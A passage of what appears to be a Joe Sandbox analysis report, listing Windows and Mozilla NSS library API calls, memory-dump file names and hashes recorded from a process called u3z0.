                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C850880
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,6C7E204A), ref: 6C8508CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508FB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D11
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D2A
                                                                                                                                                                                                                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D4A
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D57
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4D97
                                                                                                                                                                                                                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DBA
                                                                                                                                                                                                                                                                                        • PR_WaitCondVar.NSS3 ref: 6C7E4DD4
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DE6
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4DEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 406595b9269dfe7d769dcdd874d4555d82811ec441d87c72ae2eda06ff6dbcfe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a49046040d51dc359521aeea3889fe3896f21a2624ef821fb5242059a1c70a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F4182B2A08715CFDB00EFB8D6885697BF4BF0A318F154669DC889B710E730E994CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C76C5A3
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C76C9EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C76C9FB
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C76CA12
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C76CA2E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C76CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                                                        • String ID: (null)$0
                                                                                                                                                                                                                                                                                        • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                                                        • Opcode ID: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
                                                                                                                                                                                                                                                                                        • Instruction ID: 1b0daa5b01b1b4cdfdedddd8b0e06a1892f292a73826c79ea250fe1fcb5ab7fc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 064e7b9da10e0213b85ca00390785c4762ce68b32e004b7a38ac85414ce8390f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1BF306083429FDB00DF2ACA5475ABBE1BF89749F18882DED99D7B41D731E805CB96
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743492
                                                                                                                                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434A9
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C7434EF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C74350E
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C743522
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C743552
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C74357C
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C743592
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                        • Opcode ID: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
                                                                                                                                                                                                                                                                                        • Instruction ID: 34b9c4729275dc8e61743340ab067b36fd5ea9f73cd3bdccd43ea57558c0d85d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b76c3c63b56258a473492db5baec828f702fc93a24e691c632da64baf405d16
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB318F71B0020B9FDF14DFB9CA48AAAB7B9FB45705F104539E505E3660DB70AB04CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C8ADE64), ref: 6C8AED0C
                                                                                                                                                                                                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8AED22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9918D0,?), ref: 6C8BB095
                                                                                                                                                                                                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C8AED4A
                                                                                                                                                                                                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C8AED6B
                                                                                                                                                                                                                                                                                        • PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED38
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: TlsGetValue.KERNEL32(?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4C97
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CB0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7E4C70: PR_Unlock.NSS3(?,?,?,?,?,6C7E3921,6C9C14E4,6C92CC70), ref: 6C7E4CC9
                                                                                                                                                                                                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C8AED52
                                                                                                                                                                                                                                                                                        • PR_CallOnce.NSS3(6C9C2AA4,6C8C12D0), ref: 6C8AED83
                                                                                                                                                                                                                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C8AED95
                                                                                                                                                                                                                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C8AED9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C8C127C,00000000,00000000,00000000), ref: 6C8C650E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                        • String ID: security
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C892CEC
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C892D07
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_Now.NSS3 ref: 6C970A22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C970A35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C970A66
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_GetCurrentThread.NSS3 ref: 6C970A70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C970A9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C970AC8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_vsmprintf.NSS3(?,?), ref: 6C970AE8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970B19
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970B48
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970C76
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: PR_LogFlush.NSS3 ref: 6C970C7E
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C892D22
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970B88
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C970C5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C970C8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970C9C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970CD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970CEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970CFB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C970D16
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C970D26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C970D65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C970D70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C970D90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: free.MOZGLUE(00000000), ref: 6C970D99
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C892D3B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C970BAB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970BBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C970D7E
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C892D54
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C970BCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: EnterCriticalSection.KERNEL32(?), ref: 6C970BDE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9709D0: OutputDebugStringA.KERNEL32(?), ref: 6C970C16
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C8D2C2A), ref: 6C8D0C81
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BBE30: SECOID_FindOID_Util.NSS3(6C87311B,00000000,?,6C87311B,?), ref: 6C8BBE44
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A8500: SECOID_GetAlgorithmTag_Util.NSS3(6C8A95DC,00000000,00000000,00000000,?,6C8A95DC,00000000,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A8517
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0CC4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8BFAB0: free.MOZGLUE(?,-00000001,?,?,6C85F673,00000000,00000000), ref: 6C8BFAC7
                                                                                                                                                                                                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8D0CD5
                                                                                                                                                                                                                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C8D0D1D
                                                                                                                                                                                                                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C8D0D3B
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C8D0D7D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8D0DB5
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0DC1
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8D0DF7
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D0E05
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8D0E0F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A95E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C887F4A,00000000,?,00000000,00000000), ref: 6C8A95F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C8A9609
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8A961D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetInternalSlot.NSS3 ref: 6C8A970B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8A9756
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: PK11_GetIVLength.NSS3(?), ref: 6C8A9767
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C8A977E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8A978E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
